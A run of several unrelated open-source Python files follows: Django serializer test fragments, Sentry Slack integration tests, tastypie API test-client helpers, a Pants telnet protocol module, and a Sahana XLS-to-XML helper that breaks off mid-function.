natural_key_test_data: with connection.constraint_checks_disabled(): objects.extend(func[0](pk, klass, datum)) # Get a count of the number of objects created for each class for klass in instance_count: instance_count[klass] = klass.objects.count() # Serialize the test database serialized_data = serializers.serialize(format, objects, indent=2, use_natural_keys=True) for obj in serializers.deserialize(format, serialized_data): obj.save() # Assert that the deserialized data is the same # as the original source for (func, pk, klass, datum) in natural_key_test_data: func[1](self, pk, klass, datum) # Assert that the number of objects deserialized is the # same as the number that was serialized. for klass, count in instance_count.items(): self.assertEqual(count, klass.objects.count()) def fieldsTest(format, self): obj = ComplexModel(field1='first', field2='second', field3='third') obj.save_base(raw=True) # Serialize then deserialize the test database serialized_data = serializers.serialize(format, [obj], indent=2, fields=('field1','field3')) result = six.advance_iterator(serializers.deserialize(format, serialized_data)) # Check that the deserialized object contains data in only the serialized fields. self.assertEqual(result.object.field1, 'first') self.assertEqual(result.object.field2, '') self.assertEqual(result.object.field3, 'third') def streamTest(format, self): obj = ComplexModel(field1='first',field2='second',field3='third') obj.save_base(raw=True) # Serialize the test database to a stream for stream in (StringIO(), HttpResponse()): serializers.serialize(format, [obj], indent=2, stream=stream) # Serialize normally for a comparison string_data = serializers.serialize(format, [obj], indent=2) # Check that the two are the same if not isinstance(stream, HttpResponse): self.assertEqual(string_data, stream.getvalue()) else: self.assertEqual(string_data.encode('utf-8'), stream.content) stream.close() for format in serializers.get_serializer_formats(): setattr(SerializerTests, 'test_' + format + '_serializer', curry(serializerTest, format)) setattr(SerializerTests, 'test_' + format + '_natural_key_serializer', curry(naturalKeySerializerTest, format)) setattr(SerializerTests, 'test_' + format + '_serializer_fields', curry(fieldsTest, format)) if format != 'python': setattr(SerializerTests, 'test_' + format + '_serializer_stream', curry(streamTest, format))
from __future__ import absolute_import import responses from six.moves.urllib.parse import parse_qs from mock import patch from sentry import options from sentry.models import ( Integration, OrganizationIntegration, Identity, IdentityProvider, IdentityStatus, Group, GroupStatus, GroupAssignee, AuthProvider, AuthIdentity, ) from sentry.testutils import APITestCase from sentry.utils import json from sentry.integrations.slack.action_endpoint import LINK_IDENTITY_MESSAGE from sentry.integrations.slack.link_identity import build_linking_url class BaseEventTest(APITestCase): def setUp(self): super(BaseEventTest, self).setUp() self.user = self.create_user(is_superuser=False) self.org = self.create_organization(owner=None) self.team = self.create_team(organization=self.org, members=[self.user]) self.integration = Integration.objects.create( provider="slack", external_id="TXXXXXXX1", metadata={"access_token": "xoxa-xxxxxxxxx-xxxxxxxxxx-xxxxxxxxxxxx"}, ) OrganizationIntegration.objects.create(organization=self.org, integration=self.integration) self.idp = IdentityProvider.objects.create(type="slack", external_id="TXXXXXXX1", config={}) self.identity = Identity.objects.create( external_id="slack_id", idp=self.idp, user=self.user, status=IdentityStatus.VALID, scopes=[], ) self.project1 = self.create_project(organization=self.org) self.group1 = self.create_group(project=self.project1) self.trigger_id = "13345224609.738474920.8088930838d88f008e0" self.response_url = ( "https://hooks.slack.com/actions/T47563693/6204672533/x7ZLaiVMoECAW50Gw1ZYAXEM" ) def post_webhook( self, action_data=None, type="event_callback", data=None, token=None, team_id="TXXXXXXX1", callback_id=None, slack_user=None, original_message=None, ): if token is None: token = options.get("slack.verification-token") if slack_user is None: slack_user = {"id": self.identity.external_id, "domain": "example"} if callback_id is None: callback_id = json.dumps({"issue": self.group1.id}) if original_message is None: original_message = {} payload = { "token": token, "team": {"id": team_id, "domain": "example.com"}, "channel": {"id": "C065W1189", "domain": "forgotten-works"}, "user": slack_user, "callback_id": callback_id, "action_ts": "1458170917.164398", "message_ts": "1458170866.000004", "original_message": original_message, "trigger_id": self.trigger_id, "response_url": self.response_url, "attachment_id": "1", "actions": action_data or [], "type": type, } if data: payload.update(data) payload = {"payload": json.dumps(payload)} return self.client.post("/extensions/slack/action/", data=payload) class StatusActionTest(BaseEventTest): @patch("sentry.integrations.slack.link_identity.sign") def test_ask_linking(self, sign): sign.return_value = "signed_parameters" resp = self.post_webhook(slack_user={"id": "invalid-id", "domain": "example"}) associate_url = build_linking_url( self.integration, self.org, "invalid-id", "C065W1189", self.response_url ) assert resp.status_code == 200, resp.content assert resp.data["response_type"] == "ephemeral" assert resp.data["text"] == LINK_IDENTITY_MESSAGE.format(associate_url=associate_url) def test_ignore_issue(self): status_action = {"name": "status", "value": "ignored", "type": "button"} resp = self.post_webhook(action_data=[status_action]) self.group1 = Group.objects.get(id=self.group1.id) assert resp.status_code == 200, resp.content assert self.group1.get_status() == GroupStatus.IGNORED expect_status = u"*Issue ignored by <@{}>*".format(self.identity.external_id) assert resp.data["text"].endswith(expect_status), resp.data["text"] def test_ignore_issue_with_additional_user_auth(self): """ Ensure that we can act as a user even when the organization has SSO enabled """ auth_idp = AuthProvider.objects.create(organization=self.org, provider="dummy") AuthIdentity.objects.create(auth_provider=auth_idp, user=self.user) status_action = {"name": "status", "value": "ignored", "type": "button"} resp = self.post_webhook(action_data=[status_action]) self.group1 = Group.objects.get(id=self.group1.id) assert resp.status_code == 200, resp.content assert self.group1.get_status() == GroupStatus.IGNORED expect_status = u"*Issue ignored by <@{}>*".format(self.identity.external_id) assert resp.data["text"].endswith(expect_status), resp.data["text"] def test_assign_issue(self): user2 = self.create_user(is_superuser=False) self.create_member(user=user2, organization=self.org, teams=[self.team]) # Assign to user status_action = { "name": "assign", "selected_options": [{"value": u"user:{}".format(user2.id)}], } resp = self.post_webhook(action_data=[status_action]) assert resp.status_code == 200, resp.content assert GroupAssignee.objects.filter(group=self.group1, user=user2).exists() expect_status = u"*Issue assigned to {assignee} by <@{assigner}>*".format( assignee=user2.get_display_name(), assigner=self.identity.external_id ) # Assign to team status_action = { "name": "assign", "selected_options": [{"value": u"team:{}".format(self.team.id)}], } resp = self.post_webhook(action_data=[status_action]) assert resp.status_code == 200, resp.content assert GroupAssignee.objects.filter(group=self.group1, team=self.team).exists() expect_status = u"*Issue assigned to #{team} by <@{assigner}>*".format( team=self.team.slug, assigner=self.identity.external_id ) assert resp.data["text"].endswith(expect_status), resp.data["text"] def test_assign_issue_user_has_identity(self): user2 = self.create_user(is_superuser=False) self.create_member(user=user2, organization=self.org, teams=[self.team]) user2_identity = Identity.objects.create( external_id="slack_id2", idp=self.idp, user=user2, status=IdentityStatus.VALID, scopes=[], ) status_action = { "name": "assign", "selected_options": [{"value": u"user:{}".format(user2.id)}], } resp = self.post_webhook(action_data=[status_action]) assert resp.status_code == 200, resp.content assert GroupAssignee.objects.filter(group=self.group1, user=user2).exists() expect_status = u"*Issue assigned to <@{assignee}> by <@{assigner}>*".format( assignee=user2_identity.external_id, assigner=self.identity.external_id ) assert resp.data["text"].endswith(expect_status), resp.data["text"] def test_response_differs_on_bot_message(self): status_action = {"name": "status", "value": "ignored", "type": "button"} original_message = {"type": "message"} resp = self.post_webhook(action_data=[status_action], original_message=original_message) self.group1 = Group.objects.get(id=self.group1.id) assert resp.status_code == 200, resp.content assert "attachments" in resp.data assert resp.data["attachments"][0]["title"] == self.group1.title def test_assign_user_with_multiple_identities(self): org2 = self.create_organization(owner=None) integration2 = Integration.objects.create( provider="slack", external_id="TXXXXXXX2", metadata={"access_token": "xoxa-xxxxxxxxx-xxxxxxxxxx-xxxxxxxxxxxx"}, ) OrganizationIntegration.objects.create(organization=org2, integration=integration2) idp2 = IdentityProvider.objects.create(type="slack", external_id="TXXXXXXX2", config={}) Identity.objects.create( external_id="slack_id2", idp=idp2, user=self.user, status=IdentityStatus.VALID, scopes=[], ) status_action = { "name": "assign", "selected_options": [{"value": u"user:{}".format(self.user.id)}], } resp = self.post_webhook(action_data=[status_action]) assert resp.status_code == 200, resp.content assert GroupAssignee.objects.filter(group=self.group1, user=self.user).exists() expect_status = u"*Issue assigned to <@{assignee}> by <@{assignee}>*".format( assignee=self.identity.external_id ) assert resp.data["text"].endswith(expect_status), resp.data["text"] @responses.activate def test_resolve_issue(self): status_action = {"name": "resolve_dialog", "value": "resolve_dialog"} # Expect request to open dialog on slack responses.add( method=responses.POST, url="https://slack.com/api/dialog.open", body='{"ok": true}', status=200, content_type="application/json", ) resp = self.post_webhook(action_data=[status_action]) assert resp.status_code == 200, resp.content # Opening dialog should *not* cause the current message to be updated assert resp.content == "" data = parse_qs(responses.calls[0].request.body) assert data["token"][0] == self.integration.metadata["access_token"] assert data["trigger_id"][0] == self.trigger_id assert "dialog" in data dialog = json.loads(data["dialog"][0]) callback_data = json.loads(dialog["callback_id"]) assert int(callback_data["issue"]) == self.group1.id assert callback_data["orig_response_url"] == self.response_url # Completing the dialog will update the message responses.add( method=responses.POST, url=self.response_url, body='{"ok": true}', status=200, content_type="application/json", ) resp = self.post_webhook( type="dialog_submission", callback_id=dialog["callback_id"], data={"submission": {"resolve_type": "resolved"}}, ) self.group1 = Group.objects.get(id=self.group1.id) assert resp.status_code == 200, resp.content assert self.group1.get_status() == GroupStatus.RESOLVED update_data = json.loads(responses.calls[1].request.body) expect_status = u"*Issue resolved by <@{}>*".format(self.identity.external_id) assert update_data["text"].endswith(expect_status) def test_permission_denied(self): user2 = self.create_user(is_superuser=False) user2_identity = Identity.objects.create( external_id="slack_id2", idp=self.idp, user=user2, status=IdentityStatus.VALID, scopes=[], ) status_action = {"name": "status", "value": "ignored", "type": "button"} resp = self.post_webhook( action_data=[status_action], slack_user={"id": user2_identity.external_id} ) self.group1 = Group.objects.get(id=self.group1.id) assert resp.status_code == 200, resp.content assert not self.group1.get_status() == GroupStatus.IGNORED assert resp.data["response_type"] == "ephemeral" assert not resp.data["replace_original"] assert resp.data["text"] == "Sentry can't perform that action right now on your behalf!" def test_invalid_token(self): resp = self.post_webhook(token="invalid") assert resp.status_code == 401 def test_no_integration(self): self.integration.delete() resp = self.post_webhook() assert resp.status_code == 403 def test_slack_bad_payload(self): resp = self.client.post("/extensions/slack/action/", data={"nopayload": 0}) assert resp.status_code == 400
from __future__ import unicode_literals import time from django.conf import settings from django.test import TestCase from django.test.client import FakePayload, Client from django.utils.encoding import force_text from tastypie.serializers import Serializer try: from urllib.parse import urlparse except ImportError: from urlparse import urlparse class TestApiClient(object): def __init__(self, serializer=None): """ Sets up a fresh ``TestApiClient`` instance. If you are employing a custom serializer, you can pass the class to the ``serializer=`` kwarg. """ self.client = Client() self.serializer = serializer if not self.serializer: self.serializer = Serializer() def get_content_type(self, short_format): """ Given a short name (such as ``json`` or ``xml``), returns the full content-type for it (``application/json`` or ``application/xml`` in this case). """ return self.serializer.content_types.get(short_format, 'json') def get(self, uri, format='json', data=None, authentication=None, **kwargs): """ Performs a simulated ``GET`` request to the provided URI. Optionally accepts a ``data`` kwarg, which in the case of ``GET``, lets you send along ``GET`` parameters. This is useful when testing filtering or other things that read off the ``GET`` params. Example:: from tastypie.test import TestApiClient client = TestApiClient() response = client.get('/api/v1/entry/1/', data={'format': 'json', 'title__startswith': 'a', 'limit': 20, 'offset': 60}) Optionally accepts an ``authentication`` kwarg, which should be an HTTP header with the correct authentication data already setup. All other ``**kwargs`` passed in get passed through to the Django ``TestClient``. See https://docs.djangoproject.com/en/dev/topics/testing/#module-django.test.client for details. """ content_type = self.get_content_type(format) kwargs['HTTP_ACCEPT'] = content_type # GET & DELETE are the only times we don't serialize the data. if data is not None: kwargs['data'] = data if authentication is not None: kwargs['HTTP_AUTHORIZATION'] = authentication return self.client.get(uri, **kwargs) def post(self, uri, format='json', data=None, authentication=None, **kwargs): """ Performs a simulated ``POST`` request to the provided URI. Optionally accepts a ``data`` kwarg. **Unlike** ``GET``, in ``POST`` the ``data`` gets serialized & sent as the body instead of becoming part of the URI. Example:: from tastypie.test import TestApiClient client = TestApiClient() response = client.post('/api/v1/entry/', data={ 'created': '2012-05-01T20:02:36', 'slug': 'another-post', 'title': 'Another Post', 'user': '/api/v1/user/1/', }) Optionally accepts an ``authentication`` kwarg, which should be an HTTP header with the correct authentication data already setup. All other ``**kwargs`` passed in get passed through to the Django ``TestClient``. See https://docs.djangoproject.com/en/dev/topics/testing/#module-django.test.client for details. """ content_type = self.get_content_type(format) kwargs['content_type'] = content_type if data is not None: kwargs['data'] = self.serializer.serialize(data, format=content_type) if authentication is not None: kwargs['HTTP_AUTHORIZATION'] = authentication return self.client.post(uri, **kwargs) def put(self, uri, format='json', data=None, authentication=None, **kwargs): """ Performs a simulated ``PUT`` request to the provided URI. Optionally accepts a ``data`` kwarg. **Unlike** ``GET``, in ``PUT`` the ``data`` gets serialized & sent as the body instead of becoming part of the URI. Example:: from tastypie.test import TestApiClient client = TestApiClient() response = client.put('/api/v1/entry/1/', data={ 'created': '2012-05-01T20:02:36', 'slug': 'another-post', 'title': 'Another Post', 'user': '/api/v1/user/1/', }) Optionally accepts an ``authentication`` kwarg, which should be an HTTP header with the correct authentication data already setup. All other ``**kwargs`` passed in get passed through to the Django ``TestClient``. See https://docs.djangoproject.com/en/dev/topics/testing/#module-django.test.client for details. """ content_type = self.get_content_type(format) kwargs['content_type'] = content_type if data is not None: kwargs['data'] = self.serializer.serialize(data, format=content_type) if authentication is not None: kwargs['HTTP_AUTHORIZATION'] = authentication return self.client.put(uri, **kwargs) def patch(self, uri, format='json', data=None, authentication=None, **kwargs): """ Performs a simulated ``PATCH`` request to the provided URI. Optionally accepts a ``data`` kwarg. **Unlike** ``GET``, in ``PATCH`` the ``data`` gets serialized & sent as the body instead of becoming part of the URI. Example:: from tastypie.test import TestApiClient client = TestApiClient() response = client.patch('/api/v1/entry/1/', data={ 'created': '2012-05-01T20:02:36', 'slug': 'another-post', 'title': 'Another Post', 'user': '/api/v1/user/1/', }) Optionally accepts an ``authentication`` kwarg, which should be an HTTP header with the correct authentication data already setup. All other ``**kwargs`` passed in get passed through to the Django ``TestClient``. See https://docs.djangoproject.com/en/dev/topics/testing/#module-django.test.client for details. """ content_type = self.get_content_type(format) kwargs['content_type'] = content_type if data is not None: kwargs['data'] = self.serializer.serialize(data, format=content_type) if authentication is not None: kwargs['HTTP_AUTHORIZATION'] = authentication # This hurts because Django doesn't support PATCH natively. parsed = urlparse(uri) r = { 'CONTENT_LENGTH': len(kwargs['data']), 'CONTENT_TYPE': content_type, 'PATH_INFO': self.client._get_path(parsed), 'QUERY_STRING': parsed[4], 'REQUEST_METHOD': 'PATCH', 'wsgi.input': FakePayload(kwargs['data']), } r.update(kwargs) return self.client.request(**r) def delete(self, uri, format='json', data=None, authentication=None, **kwargs): """ Performs a simulated ``DELETE`` request to the provided URI. Optionally accepts a ``data`` kwarg, which in the case of ``DELETE``, lets you send along ``DELETE`` parameters. This is useful when testing filtering or other things that read off the ``DELETE`` params. Example:: from tastypie.test import TestApiClient client = TestApiClient() response = client.delete('/api/v1/entry/1/', data={'format': 'json'}) Optionally accepts an ``authentication`` kwarg, which should be an HTTP header with the correct authentication data already setup. All other ``**kwargs`` passed in get passed through to the Django ``TestClient``. See https://docs.djangoproject.com/en/dev/topics/testing/#module-django.test.client for details. """ content_type = self.get_content_type(format) kwargs['content_type'] = content_type # GET & DELETE are the only times we don't serialize the data. if data is not None: kwargs['data'] = data if authentication is not None: kwargs['HTTP_AUTHORIZATION'] = authentication return self.client.delete(uri, **kwargs) class ResourceTestCase(TestCase): """ A useful base class for the start of testing Tastypie APIs. """ def setUp(self): super(ResourceTestCase, self).setUp() self.serializer = Serializer() self.api_client = TestApiClient() def get_credentials(self): """ A convenience method for the user as a way to shorten up the often repetitious calls to create the same authentication. Raises ``NotImplementedError`` by default. Usage:: class MyResourceTestCase(ResourceTestCase): def get_credentials(self): return self.create_basic('daniel', 'pass') # Then the usual tests... """ raise NotImplementedError("You must return the class for your Resource to test.") def create_basic(self, username, password): """ Creates & returns the HTTP ``Authorization`` header for use with BASIC Auth. """ import base64 return 'Basic %s' % base64.b64encode(':'.join([username, password]).encode('utf-8')).decode('utf-8') def create_apikey(self, username, api_key): """ Creates & returns the HTTP ``Authorization`` header for use with ``ApiKeyAuthentication``. """ return 'ApiKey %s:%s' % (username, api_key) def create_digest(self, username, api_key, method, uri): """ Creates & returns the HTTP ``Authorization`` header for use with Digest Auth. """ from tastypie.authentication import hmac, sha1, uuid, python_digest new_uuid = uuid.uuid4() opaque = hmac.new(str(new_uuid).encode('utf-8'), digestmod=sha1).hexdigest().decode('utf-8') return python_digest.build_authorization_request( username, method.upper(), uri, 1, # nonce_count digest_challenge=python_digest.build_digest_challenge(time.time(), getattr(settings, 'SECRET_KEY', ''), 'django-tastypie', opaque, False), password=api_key ) def create_oauth(self, user): """ Creates & returns the HTTP ``Authorization`` header for use with Oauth. """ from oauth_provider.models import Consumer, Token, Resource # Necessary setup for ``oauth_provider``. resource, _ = Resource.objects.get_or_create(url='test', defaults={ 'name': 'Test Resource' }) consumer, _ = Consumer.objects.get_or_create(key='123', defaults={ 'name': 'Test', 'description': 'Testing...' }) token, _ = Token.objects.get_or_create(key='foo', token_type=Token.ACCESS, defaults={ 'consumer': consumer, 'resource': resource, 'secret': '', 'user': user, }) # Then generate the header. oauth_data = { 'oauth_consumer_key': '123', 'oauth_nonce': 'abc', 'oauth_signature': '&', 'oauth_signature_method': 'PLAINTEXT', 'oauth_timestamp': str(int(time.time())), 'oauth_token': 'foo', } return 'OAuth %s' % ','.join([key+'='+value for key, value in oauth_data.items()]) def assertHttpOK(self, resp): """ Ensures the response is returning a HTTP 200. """ return self.assertEqual(resp.status_code, 200) def assertHttpCreated(self, resp): """ Ensures the response is returning a HTTP 201. """ return self.assertEqual(resp.status_code, 201) def assertHttpAccepted(self, resp): """ Ensures the response is returning either a HTTP 202 or a HTTP 204. """ self.assertIn(resp.status_code, [202, 204]) self.assertNotIn('Content-Type', resp) def assertHttpMultipleChoices(self, resp): """ Ensures the response is returning a HTTP 300. """ return self.assertEqual(resp.status_code, 300) def assertHttpSeeOther(self, resp): """ Ensures the response is returning a HTTP 303. """ return self.assertEqual(resp.status_code, 303) def assertHttpNotModified(self, resp): """ Ensures the response is returning a HTTP 304. """ return self.assertEqual(resp.status_code, 304) def assertHttpBadRequest(self, resp): """ Ensures the response is returning a HTTP 400. """ return self.assertEqual(resp.status_code, 400) def assertHttpUnauthorized(self, resp): """ Ensures the response is returning a HTTP 401. """ return self.assertEqual(resp.status_code, 401) def assertHttpForbidden(self, resp): """ Ensures the response is returning a HTTP 403. """ return self.assertEqual(resp.status_code, 403) def assertHttpNotFound(self, resp): """ Ensures the response is returning a HTTP 404. """ return self.assertEqual(resp.status_code, 404) def assertHttpMethodNotAllowed(self, resp): """ Ensures the response is returning a HTTP 405. """ return self.assertEqual(resp.status_code, 405) def assertHttpConflict(self, resp): """ Ensures the response is returning a HTTP 409. """ return self.assertEqual(resp.status_code, 409) def assertHttpGone(self, resp): """ Ensures the response is returning a HTTP 410. """ return self.assertEqual(resp.status_code, 410) def assertHttpUnprocessableEntity(self, resp): """ Ensures the response is returning a HTTP 422. """ return self.assertEqual(resp.status_code, 422) def assertHttpTooManyRequests(self, resp): """ Ensures the response is returning a HTTP 429. """ return self.assertEqual(resp.status_code, 429) def assertHttpApplicationError(self, resp): """ Ensures the response is returning a HTTP 500. """ return self.assertEqual(resp.status_code, 500) def assertHttpNotImplemented(self, resp): """ Ensures the response is returning a HTTP 501. """ return self.assertEqual(resp.status_code, 501) def assertValidJSON(self, data): """ Given the provided ``data`` as a string, ensures that it is valid JSON & can be loaded properly. """ # Just try the load. If it throws an exception, the test case will fail. self.serializer.from_json(data) def assertValidXML(self, data): """ Given the provided ``data`` as a string, ensures that it is valid XML & can be loaded properly. """ # Just try the load. If it throws an exception, the test case will fail. self.serializer.from_xml(data) def assertValidYAML(self, data): """ Given the provided ``data`` as a string, ensures that it is valid YAML & can be loaded properly. """ # Just try the load. If it throws an exception, the test case will fail. self.serializer.from_yaml(data) def assertValidPlist(self, data): """ Given the provided ``data`` as a string, ensures that it is valid binary plist & can be loaded properly. """ # Just try the load. If it throws an exception, the test case will fail. self.serializer.from_plist(data) def assertValidJSONResponse(self, resp): """ Given a ``HttpResponse`` coming back from using the ``client``, assert that you get back: * An HTTP 200 * The correct content-type (``application/json``) * The content is valid JSON """ self.assertHttpOK(resp) self.assertTrue(resp['Content-Type'].startswith('application/json')) self.assertValidJSON(force_text(resp.content)) def assertValidXMLResponse(self, resp): """ Given a ``HttpResponse`` coming back from using the ``client``, assert that you get back: * An HTTP 200 * The correct content-type (``application/xml``) * The content is valid XML """ self.assertHttpOK(resp) self.assertTrue(resp['Content-Type'].startswith('application/xml')) self.assertValidXML(force_text(resp.content)) def assertValidYAMLResponse(self, resp): """ Given a ``HttpResponse`` coming back from using the ``client``, assert that you get back: * An HTTP 200 * The correct content-type (``text/yaml``) * The content is valid YAML """ self.assertHttpOK(resp) self.assertTrue(resp['Content-Type'].startswith('text/yaml')) self.assertValidYAML(force_text(resp.content)) def assertValidPlistResponse(self, resp): """ Given a ``HttpResponse`` coming back from using the ``client``, assert that you get back: * An HTTP 200 * The correct content-type (``application/x-plist``) * The content is valid binary plist data """ self.assertHttpOK(resp) self.assertTrue(resp['Content-Type'].startswith('application/x-plist')) self.assertValidPlist(force_text(resp.content)) def deserialize(self, resp): """ Given a ``HttpResponse`` coming back from using the ``client``, this method checks the ``Content-Type`` header & attempts to deserialize the data based on that. It returns a Python datastructure (typically a ``dict``) of the serialized data. """ return self.serializer.deserialize(resp.content, format=resp['Content-Type']) def serialize(self, data, format='application/json'): """ Given a Python datastructure (typically a ``dict``) & a desired content-type, this method will return a serialized string of that data. """ return self.serializer.serialize(data, format=format) def assertKeys(self, data, expected): """ This method ensures that the keys of the ``data`` match up to the keys of ``expected``. It covers the (extremely) common case where you want to make sure the keys of a response match up to what is expected. This is typically less fragile than testing the full structure, which can be prone to data changes. """ self.assertEqual(sorted(data.keys()), sorted(expected))
############################################################################### # # Copyright 2011-2012 Pants Developers (see AUTHORS.txt) # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ############################################################################### ############################################################################### # Imports ############################################################################### import re import struct from pants import Stream, Server try: from netstruct import NetStruct as _NetStruct except ImportError: # Create the fake class because isinstance expects a class. class _NetStruct(object): def __init__(self, *a, **kw): raise NotImplementedError ############################################################################### # Logging ############################################################################### import logging log = logging.getLogger(__name__) ############################################################################### # Constants ############################################################################### RegexType = type(re.compile("")) Struct = struct.Struct # Telnet commands IAC = chr(255) # Interpret As Command DONT = chr(254) # Don't Perform DO = chr(253) # Do Perform WONT = chr(252) # Won't Perform WILL = chr(251) # Will Perform SB = chr(250) # Subnegotiation Begin SE = chr(240) # Subnegotiation End ############################################################################### # TelnetConnection Class ############################################################################### class TelnetConnection(Stream): """ A basic implementation of a Telnet connection. A TelnetConnection object is capable of identifying and extracting Telnet command sequences from incoming data. Upon identifying a Telnet command, option or subnegotiation, the connection will call a relevant placeholder method. This class should be subclassed to provide functionality for individual commands and options. """ def __init__(self, **kwargs): Stream.__init__(self, **kwargs) # Initialize Stuff self._telnet_data = "" ##### Public Event Handlers ############################################### def on_command(self, command): """ Placeholder. Called when the connection receives a telnet command, such as AYT (Are You There). ========= ============ Argument Description ========= ============ command The byte representing the telnet command. ========= ============ """ pass def on_option(self, command, option): """ Placeholder. Called when the connection receives a telnet option negotiation sequence, such as IAC WILL ECHO. ========= ============ Argument Description ========= ============ command The byte representing the telnet command. option The byte representing the telnet option being negotiated. ========= ============ """ pass def on_subnegotiation(self, option, data): """ Placeholder. Called when the connection receives a subnegotiation sequence. ========= ============ Argument Description ========= ============ option The byte representing the telnet option for which subnegotiation data has been received. data The received data. ========= ============ """ pass ##### Internal Telnet State Processing #################################### def _on_telnet_data(self, data): self._telnet_data += data while self._telnet_data: delimiter = self.read_delimiter if delimiter is None: data = self._telnet_data self._telnet_data = '' self._safely_call(self.on_read, data) elif isinstance(delimiter, (int, long)): if len(self._telnet_data) < delimiter: break data = self._telnet_data[:delimiter] self._telnet_data = self._telnet_data[delimiter:] self._safely_call(self.on_read, data) elif isinstance(delimiter, basestring): mark = self._telnet_data.find(delimiter) if mark == -1: break data = self._telnet_data[:mark] self._telnet_data = self._telnet_data[mark + len(delimiter):] self._safely_call(self.on_read, data) elif isinstance(delimiter, Struct): # Weird. Why are you using Struct in telnet? Silly person. if len(self._telnet_data) < delimiter.size: break data = self._telnet_data[:delimiter.size] self._telnet_data = self._telnet_data[delimiter.size:] try: data = delimiter.unpack(data) except struct.error: log.exception("Unable to unpack data on %r." % self) self.close() break self._safely_call(self.on_read, *data) elif isinstance(delimiter, _NetStruct): # Ditto for NetStruct. if not self._netstruct_iter: # We need to get started. self._netstruct_iter = delimiter.iter_unpack() self._netstruct_needed = next(self._netstruct_iter) if len(self._telnet_data) < self._netstruct_needed: break data = self._netstruct_iter.send( self._telnet_data[:self._netstruct_needed]) self._telnet_data = self._telnet_data[self._netstruct_needed:] if isinstance(data, (int,long)): self._netstruct_needed = data continue # Still here? Then we've got our object. Delete the NetStruct # state and send the data. self._netstruct_needed = None self._netstruct_iter = None self._safely_call(self.on_read, *data) elif isinstance(delimiter, RegexType): # Depending on regex_search, we could do this two ways. if self.regex_search: match = delimiter.search(self._telnet_data) if not match: break data = self._telnet_data[:match.start()] self._telnet_data = self._telnet_data[match.end():] else: data = delimiter.match(self._telnet_data) if not data: break self._telnet_data = self._telnet_data[data.end():] self._safely_call(self.on_read, data) else: log.warning("Invalid read_delimiter on %r." % self) break if self._closed or not self.connected: break def _on_telnet_iac(self, data): if len(data) < 2: return False elif data[1] == IAC: # It's an escaped IAC byte. Send it to the data buffer. self._on_telnet_data(IAC) return data[2:] elif data[1] in '\xFB\xFC\xFD\xFE': if len(data) < 3: return False self._safely_call(self.on_option, data[1], data[2]) return data[3:] elif data[1] == SB: seq = '' code = data[2:] data = data[3:] if not data: return False while data: loc = data.find(IAC) if loc == -1: return False seq += data[:loc] if data[loc + 1] == SE: # Match data = data[loc+2:] break elif data[loc + 1] == IAC: # Escaped seq += IAC data = data[loc+2:] continue # Unknown. Skip it. data = data[loc + 1:] if not data: return False self._safely_call(self.on_subnegotiation, code, seq) # Still here? It must just be a command then. Send it on. self._safely_call(self.on_command, data[1]) return data[2:] ##### Internal Processing Methods ######################################### def _process_recv_buffer(self): """ Completely replace the standard recv buffer processing with a custom function for optimal telnet performance. """ while self._recv_buffer: loc = self._recv_buffer.find(IAC) if loc == -1: self._on_telnet_data(self._recv_buffer) self._recv_buffer = '' break elif loc > 0: self._on_telnet_data(self._recv_buffer[:loc]) self._recv_buffer = self._recv_buffer[loc:] out = self._on_telnet_iac(self._recv_buffer) if out is False: break self._recv_buffer = out ############################################################################### # TelnetServer Class ############################################################################### class TelnetServer(Server): """ A basic implementation of a Telnet server. """ ConnectionClass = TelnetConnection
# -*- coding: utf-8 -*- # # Debug/Helper script for XLS stylesheet development # # >>> python xls2xml <XLS File> # ... converts the XLS file into XML # # >>> python xls2xml <XLS File> <XSLT Stylesheet> # ... converts the XLS file into XML and transforms it using the stylesheet # import datetime import sys from lxml import etree from xml.sax.saxutils import escape, unescape TABLE = "table" ROW = "row" COL = "col" FIELD = "field" TAG = "tag" HASHTAG = "hashtag" # ----------------------------------------------------------------------------- def xml_encode(s): if s: s = escape(s, {"'": "&apos;", '"': "&quot;"}) return s # ----------------------------------------------------------------------------- def xml_decode(s): if s: s = unescape(s, {"&apos;": "'", "&quot;": '"'}) return s # ----------------------------------------------------------------------------- def parse(source): parser = etree.XMLParser(no_network=False) result = etree.parse(source, parser) return result # ----------------------------------------------------------------------------- def s3_unicode(s, encoding="utf-8"): if type(s) is unicode: return s try: if not isinstance(s, basestring): if hasattr(s, "__unicode__"): s = unicode(s) else: try: s = unicode(str(s), encoding, "strict") except UnicodeEncodeError: if not isinstance(s, Exception): raise s = " ".join([s3_unicode(arg, encoding) for arg in s]) else: s = s.decode(encoding) except UnicodeDecodeError: if not isinstance(s, Exception): raise else: s = " ".join([s3_unicode(arg, encoding) for arg in s]) return s # ------------------------------------------------------------------------- def encode_iso_datetime(dt): dx = dt - datetime.timedelta(microseconds=dt.microsecond) return dx.isoformat() # ------------------------------------------------------------------------- def xls2tree(source, resourcename=None, extra_data=None, hashtags=None, sheet=None, rows=None, cols=None, fields=None, header_row=True): import xlrd # Shortcuts SubElement = etree.SubElement DEFAULT_SHEET_NAME = "SahanaData" # Root element root = etree.Element(TABLE) if resourcename is not None: root.set("name", resourcename) if isinstance(sheet, xlrd.sheet.Sheet): # Open work sheet passed as argument => use this s = sheet else: if hasattr(source, "read"): # Source is a stream if hasattr(source, "seek"): source.seek(0) wb = xlrd.open_workbook(file_contents=source.read(), # requires xlrd 0.7.x or higher on_demand=True) elif isinstance(source, xlrd.book.Book): # Source is an open work book wb = source else: # Unsupported source type raise RuntimeError("xls2tree: invalid source %s" % type(source)) # Find the sheet try: if isinstance(sheet, (int, long)): s = wb.sheet_by_index(sheet) elif isinstance(sheet, basestring): s = wb.sheet_by_name(sheet) elif sheet is None: if DEFAULT_SHEET_NAME in wb.sheet_names(): s = wb.sheet_by_name(DEFAULT_SHEET_NAME) else: s = wb.sheet_by_index(0) else: raise SyntaxError("xls2tree: invalid sheet %s" % sheet) except IndexError, xlrd.XLRDError: s = None def cell_range(cells, max_cells): """ Helper method to calculate a cell range @param cells: the specified range @param max_cells: maximum number of cells """ if not cells: cells = (0, max_cells) elif not isinstance(cells, (tuple, list)): cells = (0, cells) elif len(cells) == 1: cells = (cells[0], max_cells) else: cells = (cells[0], cells[0] + cells[1]) return cells if s: # Calculate cell range rows = cell_range(rows, s.nrows) cols = cell_range(cols, s.ncols) # Column headers if fields: headers = fields elif not header_row: headers = 